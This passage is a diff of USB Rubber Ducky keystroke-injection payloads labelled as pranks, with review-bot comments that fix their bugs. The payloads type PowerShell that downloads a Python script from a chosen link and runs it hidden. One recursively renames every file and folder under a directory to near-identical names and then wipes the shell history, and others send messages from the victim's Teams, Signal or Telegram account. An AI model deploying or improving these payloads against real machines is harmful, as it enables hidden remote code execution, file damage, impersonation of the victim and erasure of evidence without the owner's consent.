$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
DELAY 1000
GUI r
DELAY 500
STRING powershell
ENTER
STRINGLN powershell
DELAY 500
STRING Invoke-WebRequest -Uri "
STRING SCRIPT-PY-LINK
STRING " -OutFile "script.py"
ENTER
STRINGLN Invoke-WebRequest -Uri "#SCRIPT-PY-LINK" -OutFile "script.py"
DELAY 500
STRINGLN Start-Process python.exe -ArgumentList "script.py" -WindowStyle Hidden
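Review bot: `DELAY 500` between `STRINGLN powershell` and `STRINGLN Invoke-WebRequest ...` gives the PowerShell host half a second to appear, while the sibling "Change Wallpaper With Screenshot" payload in this same diff uses `DELAY 2000` for the identical step; keystrokes typed before the console exists are not delivered to it. Use the same value in both payloads, or a readiness check, rather than two different guesses for the same host startup.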

View File

@ -1,29 +1,69 @@
REM ##################################################
REM # |
REM # Title : Play A Song Through Spotify |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Prank |
REM # Target : Windows 10-11 |
REM # |
REM ##################################################
REM Requirements:
REM - Internet Connection
REM - Spotify installed and user logged-in
REM - ExecutionPolicy Bypass
REM_BLOCK
##################################################
# #
# Title : Play A Song Through Spotify #
# Author : Aleff #
# Version : 1.0 #
# Category : Prank #
# Target : Windows 10-11 #
# #
##################################################
Requirements:
- Internet Connection
- Spotify installed and user logged-in
- ExecutionPolicy Bypass
END_REM
REM REQUIRED - Set your song name
DEFINE SONG-NAME example
DEFINE #SONG-NAME example
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
DELAY 1000
GUI r
DELAY 1000
STRING powershell
ENTER
STRINGLN powershell
DELAY 2000
STRINGLN Start-Process "spotify://"
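Review bot: the Requirements carried into the new REM_BLOCK still list `- ExecutionPolicy Bypass`, but nothing in this payload runs a script file; `STRINGLN Start-Process "spotify://"` only launches a URI handler, which the execution policy does not govern, so that requirement is stale documentation and should be dropped. Same observation as for the earlier hunk: `$_OS` is set by the added extension and never tested, so the `IF ($_OS == WINDOWS) THEN` guard from the extension's usage block is missing before `GUI r`.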
@ -43,8 +83,7 @@ REM Some times popups of advertisements may come out and usually they will click
REM ESCAPE
REM DELAY 500
STRING SONG-NAME
ENTER
STRINGLN #SONG-NAME
DELAY 1000
TAB
DELAY 500

View File

@ -1,12 +1,14 @@
REM #####################################################
REM # #
REM # Title : Prank In The Middle - Thunderbird #
REM # Author : Aleff #
REM # Version : 1.0 #
REM # Category : Prank #
REM # Target : Windows 10/11 #
REM # #
REM #####################################################
REM_BLOCK
#####################################################
# #
# Title : Prank In The Middle - Thunderbird #
# Author : Aleff #
# Version : 1.0 #
# Category : Prank #
# Target : Windows 10/11 #
# #
#####################################################
END_REM
EXTENSION DETECT_READY
REM VERSION 1.1
@ -38,8 +40,7 @@ END_EXTENSION
REM Open Thunderbird and goto settings
GUI r
STRING thunderbird
ENTER
STRINGLN thunderbird
DELAY 1000
REPEAT 4 TAB
ENTER
@ -70,8 +71,7 @@ DELAY 500
REM Open the powershell and goto the directory
GUI r
STRING powershell
ENTER
STRINGLN powershell
DELAY 1500
STRING cd
DELAY 500

View File

@ -0,0 +1,118 @@
# Same File Name Prank
This script, titled **Rename Everything Similarly**, is written in **DuckyScript 3.0** and designed to rename files and directories recursively on **Windows** or **GNU/Linux** systems, depending on the target environment. The script renames directories and files within a specified directory, giving them sequential and similar names.
Specifically, the ability to add a blank space to the end of the name is used. On Windows systems, if file extension viewing is not enabled the names will look identical to the human eye, while on GNU/Linux systems the difference may be more easily noticed.
![No extensions](https://github.com/aleff-github/Deposito/blob/main/Rename_Everything_Similarly/1.png?raw=true)
> How does renaming files using spaces without seeing the extension appear on windows. - To the human eye they look identical.
![With extensions](https://github.com/aleff-github/Deposito/blob/main/Rename_Everything_Similarly/2.png?raw=true)
> What it looks like instead if you turn on the extension view.
# Index
1. [Features](#features)
2. [Payload Structure](#payload-structure)
- [Conditional Target OS Execution](#conditional-target-os-execution)
- [PowerShell (Windows)](#powershell-windows)
- [Bash (GNU/Linux)](#bash-gnulinux)
3. [How to Use](#how-to-use)
4. [Why not MacOS?](#why-not-macos)
5. [Notes](#notes)
6. [Credits](#credits)
## Features
- **Cross-platform support**: The script can be executed on either **Windows** or **GNU/Linux** systems, based on the defined conditions, unfortunately it could not be published for macOS as well, [read more](#why-not-macos).
- **Recursive renaming**: It renames all directories and files inside a given directory, iterating through subdirectories.
- **Customizable**: Users can modify the base directory path and rename pattern as needed.
## Payload Structure
### Conditional Target OS Execution
The script detects (*from the DEFINE*) the target OS and adapts to either **Windows** or **GNU/Linux**:
- If the target system is **Windows**, the script will execute a PowerShell script.
- If the target system is **Linux**, it will execute a Bash script.
### PowerShell (Windows)
For **Windows** systems, the script:
- Opens **PowerShell** and runs the `Rename-Directories` and `Rename-Files` functions.
- It renames directories by assigning sequential names like `d`, `dd`, etc., and files with names like `a`, `a `, `a `, followed by their respective file extensions.
### Bash (GNU/Linux)
For **GNU/Linux** systems, the script:
- Opens a terminal and executes two Bash functions: `rename_directories` and `rename_files`.
- It performs similar renaming of directories and files, using `mv` to rename them with sequential names (like `d`, `dd`, etc... or `a`, `a `, `a ` etc...).
## How to Use
1. **Edit Definitions (*not mandatory, Windows by default*)**: Adjust the following definitions in the script according to your environment:
- `DEFINE #TARGET_WINDOWS TRUE`: Leave **#TARGET_WINDOWS** to **TRUE** if the script will run on a Windows system.
- `DEFINE #TARGET_GNU_LINUX FALSE`: Set **TARGET_LINUX** to **TRUE** if the script will run on a GNU/Linux system.
- Ufortunately it could not be published for macOS as well, [read more](#why-not-macos).
- `#DIRECTORY_WHERE_TO_RUN_THE_COMMAND`: Specify the base directory where the renaming operation should occur, the default is `.` so the default route of Powershell and Bash.
Consider that the main route for Windows generally is `C:\Users\Username\` while for GNU/Linux systems it is something like `/home/username/` but in both cases if for istance you add `./Desktop/Hello/World/` you will go to the World folder in the path `C:\Users\Username\Desktop\Hello\World\` for Windows systems and `/home/username/Desktop/Hello/World/`.
Of course, you have to make sure that this folder exists....
![Windows command](https://github.com/aleff-github/Deposito/blob/main/Rename_Everything_Similarly/3.png?raw=true)
> How Windows response to the command `cd ./Desktop/Hello/World/`
![Ubuntu command](https://github.com/aleff-github/Deposito/blob/main/Rename_Everything_Similarly/4.png?raw=true)
> How Ubuntu response to the command `cd ./Desktop/Hello/World/`
Consider the maximum length of file names on both Windows and GNU/Linux:
- [Limit on file name length in bash \[closed\]](https://stackoverflow.com/questions/6571435/limit-on-file-name-length-in-bash)
|=> https://stackoverflow.com/questions/6571435/limit-on-file-name-length-in-bash
- [On Windows, what is the maximum file name length considered acceptable for an app to output? (Updated and clarified)](https://stackoverflow.com/questions/8674796/on-windows-what-is-the-maximum-file-name-length-considered-acceptable-for-an-ap)
|=> https://stackoverflow.com/questions/8674796/on-windows-what-is-the-maximum-file-name-length-considered-acceptable-for-an-ap
2. **Load Payload**: Upload the script to a USB Rubber Ducky device using the **DuckEncoder**.
3. **Execute Payload**: Insert the USB Rubber Ducky into the target machine.
## Why not MacOS?
I am very sorry not to be able to release scripts for macOS systems as well but unfortunately not having one would be too risky to test it in a VM, at least in my opinion, so if someone from the community wants to contribute they could propose a pull request with the macOS version so that we can integrate it and make this payload cross-platfom.
If I could know the behavior of this script on macOS (*which probably remains completely unchanged from use on GNU/Linux systems*) it could be optimized in that it could be reduced to a **WINDOWS_PASSIVE_DETECT** where if it is not Windows (*so generally GNU/Linux or macOS systems*) the bash script may be fine.
## Notes
- Ensure that the specified directories exist on the target machine.
- Use with caution on sensitive systems, as the renaming process is recursive and may affect large directories.
- Contributions to add support for macOS are welcome.
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>
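Review bot: the "How to Use" step for the second definition names the wrong constant: the line reads `DEFINE #TARGET_GNU_LINUX FALSE`: Set **TARGET_LINUX** to **TRUE**, while the define in payload.txt is `#TARGET_GNU_LINUX`, so the text should say **#TARGET_GNU_LINUX**. The Notes section should also mention that both branches delete the user's shell history at the end (`Remove-Item (Get-PSReadlineOption).HistorySavePath` and `rm $HISTFILE` in the payload), which is a side effect beyond renaming and not implied by "may affect large directories". Spelling to fix in the same hunk: "Ufortunately", "for istance", "cross-platfom", and the two captions "How Windows response to" / "How Ubuntu response to" should read "responds". The `|=>` lines under each reference repeat the URL that the link already carries and can go.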

View File

@ -0,0 +1,222 @@
REM_BLOCK
#############################################
# #
# Title : Same File Name Prank #
# Author : Aleff #
# Version : 1.0 #
# Category : Prank #
# Target : Windows 10/11; GNU/Linux #
# #
#############################################
END_REM
REM I am very sorry not to be able to release scripts for macOS systems as well but unfortunately not having one would be too risky to test it in a VM, at least in my opinion, so if someone from the community wants to contribute they could propose a pull request with the macOS version so that we can integrate it and make this payload cross-platfom.
REM %%%%% DEFINE-SECTION %%%%%
REM_BLOCK
Consider that the main route for Windows generally is “C:\Users\Username\” while for GNU/Linux systems it is something like “/home/username/” but in both cases if for example you add “./Desktop/Hello/World/” you will go to the World folder in the path “C:\Users\Username\Desktop\Hello\World\” for Windows systems and “/home/username/Desktop/Hello/World/” for **GNU/Linux** systems.
Of course, you have to make sure that this folder exists....
Payload Settings:
#DIRECTORY_WHERE_TO_RUN_THE_COMMAND - If you feel it is appropriate to run this script within a specific folder you will just need to change this definition.
Consider the maximum length of file names on both Windows and GNU/Linux:
- Limit on file name length in bash [closed]
|-> https://stackoverflow.com/questions/6571435/limit-on-file-name-length-in-bash
- On Windows, what is the maximum file name length considered acceptable for an app to output? (Updated and clarified)
|-> https://stackoverflow.com/questions/8674796/on-windows-what-is-the-maximum-file-name-length-considered-acceptable-for-an-ap
END_REM
DEFINE #DIRECTORY_WHERE_TO_RUN_THE_COMMAND .
REM Set TARGET_WINDOWS to TRUE if the script will run on a Windows system.
REM Set TARGET_LINUX to TRUE if the script will run on a GNU/Linux system.
DEFINE #TARGET_WINDOWS TRUE
DEFINE #TARGET_GNU_LINUX FALSE
REM %%%%% PAYLOAD-SECTION %%%%%
IF (( #TARGET_WINDOWS == TRUE) && (#TARGET_GNU_LINUX == FALSE)) THEN
REM %%%%% WINDOWS CODE %%%%%
REM_BLOCK
Credits: Hak5 LLC
Website: https://hak5.org/
Source: https://github.com/hak5/usbrubberducky-payloads/blob/master/payloads/extensions/passive_windows_detect.txt
END_REM
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
GUI r
DELAY 1000
STRINGLN PowerShell
DELAY 1000
STRINGLN_POWERSHELL
cd #DIRECTORY_WHERE_TO_RUN_THE_COMMAND
function Rename-Directories {
param (
[string]$path,
[ref]$counter
)
$folders = Get-ChildItem -Path $path -Directory -Recurse | Sort-Object FullName -Descending
foreach ($folder in $folders) {
$newFolderName = "d" * $counter.Value # Crea il nuovo nome della cartella
$newFolderPath = $newFolderName
$counter.Value++
Rename-Item -Path $folder.FullName -NewName $newFolderPath
Write-Host "Rinominata cartella: $($folder.FullName) -> $($newFolderPath)"
}
}
function Rename-Files {
param (
[string]$path,
[ref]$counter
)
$files = Get-ChildItem -Path $path -File -Recurse
foreach ($file in $files) {
$newFileName = "a" + " " * $counter.Value # Crea il nuovo nome del file
$newFilePath = "$newFileName" + $file.Extension
$counter.Value++
Rename-Item -Path $file.FullName -NewName $newFilePath
}
}
$counter = 1; Rename-Directories -path $basePath -counter ([ref]$counter); $counter = 1; Rename-Files -path $basePath -counter ([ref]$counter); Remove-Item (Get-PSReadlineOption).HistorySavePath; exit
END_STRINGLN
ELSE IF (( #TARGET_WINDOWS == FALSE) && (#TARGET_GNU_LINUX == TRUE)) THEN
REM %%%%% GNU/LINUX CODE %%%%%
REM_BLOCK
Credits: Hak5 LLC
Website: https://hak5.org/
Source: https://github.com/hak5/usbrubberducky-payloads/blob/master/payloads/extensions/detect_ready.txt
END_REM
EXTENSION DETECT_READY
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
TARGETS:
Any system that reflects CAPSLOCK will detect minimum required delay
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
END_REM
REM CONFIGURATION:
DEFINE #RESPONSE_DELAY 25
DEFINE #ITERATION_LIMIT 120
VAR $C = 0
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
CAPSLOCK
DELAY #RESPONSE_DELAY
$C = ($C + 1)
END_WHILE
CAPSLOCK
END_EXTENSION
CTRL-ALT t
DELAY 1000
STRINGLN_BASH
cd #DIRECTORY_WHERE_TO_RUN_THE_COMMAND
rename_directories() {
local path=$1
local counter=$2
directories=$(find "$path" -type d | sort -r)
for dir in $directories; do
new_folder_name=$(printf 'd%.0s' $(seq 1 "$counter")) # Crea il nuovo nome della cartella
new_folder_path="$path/$new_folder_name"
counter=$((counter + 1))
mv "$dir" "$new_folder_path"
done
}
rename_files() {
local path=$1
local counter=$2
files=$(find "$path" -type f)
for file in $files; do
extension="${file##*.}"
new_file_name="a$(printf ' %.0s' $(seq 1 "$counter"))"
new_file_path="$(dirname "$file")/$new_file_name"
if [[ "$extension" != "$file" ]]; then
new_file_path="$new_file_path.$extension"
fi
counter=$((counter + 1))
mv "$file" "$new_file_path"
done
}
counter=1; rename_directories "$base_path" $counter; counter=1; rename_files "$base_path" $counter; rm $HISTFILE; exit
END_STRINGLN
END_IF
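Review bot: both invocation lines pass a variable that is never assigned, so neither branch renames anything as written. In the PowerShell block, `$counter = 1; Rename-Directories -path $basePath -counter ([ref]$counter); ...` uses `$basePath`, which is undefined after the `cd #DIRECTORY_WHERE_TO_RUN_THE_COMMAND`, so `Get-ChildItem -Path ""` fails to bind; in the Bash block, `rename_directories "$base_path" $counter` likewise passes an empty string to `find`. Either assign the variable from the define or pass `.` explicitly, since the `cd` already put the shell in the target directory. Further points in the Bash function: `for dir in $directories` word-splits the `find` output, so any path containing whitespace breaks, and `new_folder_path="$path/$new_folder_name"` moves every directory to the top of `$path` rather than renaming it in place, which differs from the PowerShell branch and from the README's "renames directories" description. The `Write-Host "Rinominata cartella: ..."` line prints to the visible PowerShell window and looks like a leftover debug print (the commit list says one was removed); the inline comments `# Crea il nuovo nome della cartella` and `# Crea il nuovo nome del file` should be in English like the rest of the repository. Finally, `IF (( #TARGET_WINDOWS == TRUE) && (#TARGET_GNU_LINUX == FALSE))` with only an `ELSE IF` for the opposite pair means that setting both defines to the same value silently does nothing; a final `ELSE` that at least documents the misconfiguration would help users.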

View File

@ -1,37 +1,82 @@
REM ###########################################
REM # |
REM # Title : Send Messages In Teams |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Prank |
REM # Target : Windows 10-11 |
REM # |
REM ###########################################
REM_BLOCK
###########################################
# #
# Title : Send Messages In Teams #
# Author : Aleff #
# Version : 1.0 #
# Category : Prank #
# Target : Windows 10-11 #
# #
###########################################
REM Requirements:
REM - Microsoft Teams installed and user logged-in
REM - Internet Connection
REM - ExecutionPolicy Bypass
REM - Python
Requirements:
- Microsoft Teams installed and user logged-in
- Internet Connection
- ExecutionPolicy Bypass
- Python
REM 1. Open a powershell
REM 2. Close if Teams is opens and reopen it
REM 3. Goto search bar
REM 4. Search the person by name, email, id or what you want...
REM 5. Downarrow and enter to open the chat
1. Open a powershell
2. Close if Teams is opens and reopen it
3. Goto search bar
4. Search the person by name, email, id or what you want...
5. Downarrow and enter to open the chat
END_REM
REM REQUIRED - Name, email, id or what you want for contact the target
DEFINE USER-ID example
REM REQUIRED - Messages
DEFINE MESSAGE1 example
REM ...
REM DEFINE MESSAGEN example..
DEFINE #USER-ID example
REM REQUIRED - Messages
DEFINE #MESSAGE1 example
REM ...
REM DEFINE #MESSAGEN example..
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
DELAY 1000
GUI r
DELAY 1000
STRING powershell
ENTER
STRINGLN powershell
DELAY 2000
REM #### Powershell ####
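Review bot: the step list moved into the REM_BLOCK keeps the original wording `2. Close if Teams is opens and reopen it`, which should read "Close Teams if it is open and reopen it"; since this text was touched in the hunk anyway, the grammar is worth fixing here. As with the other payloads that gained PASSIVE_WINDOWS_DETECT in this PR, `$_OS` is assigned but never checked before `GUI r`, so the extension only serves as a delay.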
@ -44,8 +89,7 @@ DELAY 10000
REM #### Teams ####
CTRL N
DELAY 2000
STRING USER-ID
ENTER
STRINGLN #USER-ID
DELAY 2000
TAB
DELAY 1000
@ -53,11 +97,10 @@ TAB
DELAY 1000
REM #### Messages ####
STRING MESSAGE1
ENTER
STRINGLN #MESSAGE1
DELAY 1000
REM ...
REM STRINGLN MESSAGEN
REM STRINGLN #MESSAGEN
DELAY 500
ALT F4

View File

@ -1,41 +1,83 @@
REM #########################################
REM # |
REM # Title : Send Signal Messages |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Prank, Execution |
REM # Target : Windows 10-11 |
REM # |
REM #########################################
REM_BLOCK
#########################################
# #
# Title : Send Signal Messages #
# Author : Aleff #
# Version : 1.0 #
# Category : Prank, Execution #
# Target : Windows 10-11 #
# #
#########################################
REM Requirements:
REM - Internet Connection
REM - Signal App installed
REM Payload Plug-And-Play but can be edited as you want the message
Requirements:
- Internet Connection
- Signal App installed
Payload Plug-And-Play but can be edited as you want the message
END_REM
REM REQUIRED - Receiver number
DEFINE NUMBER 3332211000
DEFINE #NUMBER 3332211000
REM REQUIRED - Message to send
DEFINE MESSAGE YOUR_MESSAGE
DEFINE #MESSAGE example
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
DELAY 1000
GUI r
DELAY 500
STRING powershell
ENTER
STRINGLN powershell
DELAY 500
STRING Stop-Process -Name "Signal"
ENTER
STRING Start-Process $Env:USERPROFILE\AppData\Local\Programs\signal-desktop\Signal.exe; exit
ENTER
STRINGLN Stop-Process -Name "Signal"
DELAY 500
STRINGLN Start-Process $Env:USERPROFILE\AppData\Local\Programs\signal-desktop\Signal.exe; exit
DELAY 5000
TAB
TAB
TAB
ENTER
DELAY 100
STRING NUMBER
STRING #NUMBER
DELAY 100
TAB
DELAY 100
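Review bot: `STRINGLN Stop-Process -Name "Signal"` raises a non-terminating error and leaves an error message in the visible console whenever Signal is not already running, which is a common state given the REM block lists the app as merely installed; `-ErrorAction SilentlyContinue` on that line matches the intent of "stop it if it is there". Documentation point: `DEFINE #MESSAGE example` changes the placeholder from `YOUR_MESSAGE` to `example`, so the REM comments in the later hunk that still tell the user to edit "the message that will be sent" should name `#MESSAGE` as the place to do it.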
@ -44,8 +86,7 @@ DELAY 200
REM This is the message that will be sent.
REM You can change it as you want, if you want.
STRING YOUR_MESSAGE
ENTER
STRINGLN #MESSAGE
REM Closing Signal App
DELAY 500

View File

@ -1,37 +1,64 @@
REM #########################################
REM # |
REM # Title : Send Telegram Messages |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Prank |
REM # Target : Linux |
REM # |
REM #########################################
REM_BLOCK
#########################################
# #
# Title : Send Telegram Messages #
# Author : Aleff #
# Version : 1.1 #
# Category : Prank #
# Target : Linux #
# #
#########################################
REM Requirements:
REM - Internet Connection
REM - telegram-desktop installed and activated
Requirements:
- Internet Connection
- telegram-desktop installed and activated
END_REM
REM Define the message receiver username
DEFINE #USERNAME @example
REM Define the message(s)
DEFINE #MESSAGE1 example
EXTENSION DETECT_READY
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
TARGETS:
Any system that reflects CAPSLOCK will detect minimum required delay
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
END_REM
REM CONFIGURATION:
DEFINE #RESPONSE_DELAY 25
DEFINE #ITERATION_LIMIT 120
VAR $C = 0
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
CAPSLOCK
DELAY #RESPONSE_DELAY
$C = ($C + 1)
END_WHILE
CAPSLOCK
END_EXTENSION
DELAY 1000
CTRL-ALT t
DELAY 2000
STRING telegram-desktop
ENTER
STRINGLN telegram-desktop
REM It depends by the computer...
DELAY 3000
REM Define the message receiver username
DEFINE USERNAME @example
STRING USERNAME
ENTER
STRINGLN #USERNAME
DELAY 500
REM Define the message(s)
DEFINE MESSAGE1 example
STRING MESSAGE1
ENTER
STRINGLN #MESSAGE1
DELAY 500
REM other messages here...
REM ...
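Review bot: this file bumps the header to `# Version : 1.1 #` while the other payloads in the same PR receive the equivalent changes (REM_BLOCK header, `#`-prefixed defines, the DETECT_READY / PASSIVE_WINDOWS_DETECT extension, `STRINGLN` collapse) and stay at 1.0; pick one convention for the whole PR. Moving the `DEFINE #USERNAME` and `DEFINE #MESSAGE1` lines from mid-payload to the top is the right call, since the old placement after `STRINGLN telegram-desktop` buried the user-editable settings; the now-redundant `REM Define the message receiver username` comment that remains near line `STRINGLN #USERNAME` should go with them.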

View File

@ -1,33 +1,70 @@
REM ############################################
REM # |
REM # Title : The Mouse Moves By Itself |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Prank |
REM # Target : Windows 10/11 |
REM # |
REM ############################################
REM Requirements:
REM - Internet Connection
REM_BLOCK
############################################
# #
# Title : The Mouse Moves By Itself #
# Author : Aleff #
# Version : 1.0 #
# Category : Prank #
# Target : Windows 10/11 #
# #
############################################
Requirements:
- Internet Connection
END_REM
REM REQUIRED - Set your Python script link
DEFINE SCRIPT-PY-LINK example.com
DEFINE #SCRIPT-PY-LINK example.com
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
DELAY 1000
GUI r
DELAY 500
STRING powershell
ENTER
STRINGLN powershell
DELAY 500
STRING Invoke-WebRequest -Uri "
STRING SCRIPT-PY-LINK
STRING " -OutFile "script.py"
ENTER
STRINGLN Invoke-WebRequest -Uri "#SCRIPT-PY-LINK" -OutFile "script.py"
DELAY 500
STRINGLN Start-Process python.exe -ArgumentList "script.py" -WindowStyle Hidden

View File

@ -1,15 +1,18 @@
REM ############################################################
REM # #
REM # Title : This damn shell doesn't work, SO SAD! :C #
REM # Author : Aleff #
REM # Version : 1.0 #
REM # Category : Prank #
REM # Target : Linux #
REM # #
REM ############################################################
REM_BLOCK
############################################################
# #
# Title : This damn shell doesn't work, SO SAD! :C #
# Author : Aleff #
# Version : 1.0 #
# Category : Prank #
# Target : Linux #
# #
############################################################
Requirements:
- Nothing <3
END_REM
REM Requirements:
REM - Nothing <3
REM With Kali Linux 2020.4, the new default shell is now ZSH for users who install the distribution.
DEFINE #TARGET_KALI_LINUX TRUE

View File

@ -1,27 +1,26 @@
REM ####################################
REM # |
REM # Title : Try To Catch Me |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Prank |
